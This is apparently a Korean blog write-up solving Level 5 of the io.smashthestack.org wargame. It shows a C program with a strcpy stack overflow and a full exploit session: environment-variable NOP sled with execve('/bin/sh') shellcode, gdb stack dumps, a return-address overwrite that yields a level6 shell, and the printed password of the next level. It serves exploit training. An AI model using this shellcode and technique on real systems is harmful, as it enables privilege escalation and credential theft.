io.smashthestack.org – Level 5

Level 5의 소스는 아래와 같다.

[code]#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {

        char buf[128];

        if(argc < 2) return 1;

        strcpy(buf, argv[1]);

        printf("%s\n", buf);

        return 0;
}
[/code]

문제는 간단하다. argv[1]을 buf 변수에 strcpy() 함수를 이용하여 옮기나 buf 변수의 크기보다 더 많은 값을 넣으면 오버플로우가 될것임을 알 수 있다.

따라서 환경변수에 NOP + SHELLCODE를 등록시킨 후 gdb를 통해 주소를 확인한 후 공격을 해보도록 하자.

[code lang-sh]level5@io:/levels$ ./level05 python -c "print 'A'*140" 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
level5@io:/levels$ export SHELLCODE=python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"
level5@io:/levels$ gdb level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"…
(gdb) b main
Breakpoint 1 at 0x80483bd
(gdb) r
Starting program: /levels/level05

Breakpoint 1, 0x080483bd in main ()
(gdb) x/32wx $esp
0xbfffdc10:     0x00000000      0x00000000      0xbfffdcb0      0xbfffdca4
0xbfffdc20:     0x00000000      0x00000000      0x00000000      0xbfffdcf0
0xbfffdc30:     0x00855668      0x0804820b      0x00000000      0x00000000
0xbfffdc40:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffdc50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffdc60:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffdc70:     0x00000000      0x00000000      0xbfffde24      0x08048320
0xbfffdc80:     0x003bdff4      0x0804960c      0xbfffdc98      0x08048291
(gdb)
0xbfffdc90:     0x003bdff4      0xbfffdd4c      0xbfffdcb8      0x08048489
0xbfffdca0:     0x00848250      0x080482f0      0x00000000      0x003bdff4
0xbfffdcb0:     0x08048470      0x080482f0      0xbfffdd18      0x0029a455
0xbfffdcc0:     0x00000001      0xbfffdd44      0xbfffdd4c      0x00f8ab18
0xbfffdcd0:     0x00000001      0x00000001      0x00000000      0x0804820b
0xbfffdce0:     0x003bdff4      0x08048470      0x080482f0      0xbfffdd18
0xbfffdcf0:     0xebb98081      0x474835fe      0x00000000      0x00000000
0xbfffdd00:     0x00000000      0x0084d2e0      0x0029a37d      0x00854ff4
(gdb)
0xbfffdd10:     0x00000001      0x080482f0      0x00000000      0x08048311
0xbfffdd20:     0x080483b4      0x00000001      0xbfffdd44      0x08048470
0xbfffdd30:     0x08048420      0x00848250      0xbfffdd3c      0x00852ae5
0xbfffdd40:     0x00000001      0xbfffde24      0x00000000      0xbfffde34
0xbfffdd50:     0xbfffdec1      0xbfffded1      0xbfffdedc      0xbfffdefe
0xbfffdd60:     0xbfffdf11      0xbfffdf1d      0xbfffdf29      0xbfffdf56
0xbfffdd70:     0xbfffdf6c      0xbfffdf7b      0xbfffdf87      0xbfffdf90
0xbfffdd80:     0xbfffdfa2      0xbfffdfaa      0xbfffdfb9      0x00000000
(gdb)
0xbfffdd90:     0x00000010      0xbfebfbff      0x00000006      0x00001000
0xbfffdda0:     0x00000011      0x00000064      0x00000003      0x08048034
0xbfffddb0:     0x00000004      0x00000020      0x00000005      0x00000007
0xbfffddc0:     0x00000007      0x0083a000      0x00000008      0x00000000
0xbfffddd0:     0x00000009      0x080482f0      0x0000000b      0x000003ed
0xbfffdde0:     0x0000000c      0x000003ed      0x0000000d      0x000003ed
0xbfffddf0:     0x0000000e      0x000003ed      0x00000017      0x00000000
0xbfffde00:     0x0000000f      0xbfffde1b      0x00000000      0x00000000
(gdb)
0xbfffde10:     0x00000000      0x00000000      0x69000000      0x00363836
0xbfffde20:     0x00000000      0x76656c2f      0x2f736c65      0x6576656c
0xbfffde30:     0x0035306c      0x4c454853      0x444f434c      0x90903d45
0xbfffde40:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde50:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde60:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde70:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde80:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb)
0xbfffde90:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffdea0:     0x176a9090      0xcddb3158      0x580b6a80      0x2f685299
0xbfffdeb0:     0x6868732f      0x6e69622f      0x5352e389      0x80cde189
0xbfffdec0:     0x45485300      0x2f3d4c4c      0x2f6e6962      0x68736162
0xbfffded0:     0x52455400      0x696c3d4d      0x0078756e      0x5f485353
0xbfffdee0:     0x45494c43      0x323d544e      0x322e3131      0x312e3831
0xbfffdef0:     0x39392e36      0x39333220      0x32203034      0x53530032
0xbfffdf00:     0x54545f48      0x642f3d59      0x702f7665      0x322f7374
(gdb)
0xbfffdf10:     0x45535500      0x656c3d52      0x356c6576      0x4c4f4300
0xbfffdf20:     0x534e4d55      0x3134313d      0x54415000      0x752f3d48
0xbfffdf30:     0x6c2f7273      0x6c61636f      0x6e69622f      0x73752f3a
0xbfffdf40:     0x69622f72      0x622f3a6e      0x2f3a6e69      0x2f727375
0xbfffdf50:     0x656d6167      0x414d0073      0x2f3d4c49      0x2f726176
0xbfffdf60:     0x6c69616d      0x76656c2f      0x00356c65      0x752f3d5f
0xbfffdf70:     0x622f7273      0x672f6e69      0x50006264      0x2f3d4457
0xbfffdf80:     0x6576656c      0x4c00736c      0x53454e49      0x0038323d
(gdb) q
The program is running.  Exit anyway? (y or n) y
level5@io:/levels$ ./level05 python -c "print 'A'*140 + '\x60\xde\xff\xbf'"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`??
    sh-3.2$ id
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1005(level5),1029(nosu)
sh-3.2$ cat /home/level06/.pass
cat: /home/level06/.pass: No such file or directory
sh-3.2$ cat /home/level6/.pass
mobjy2we
sh-3.2$
[/code]

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다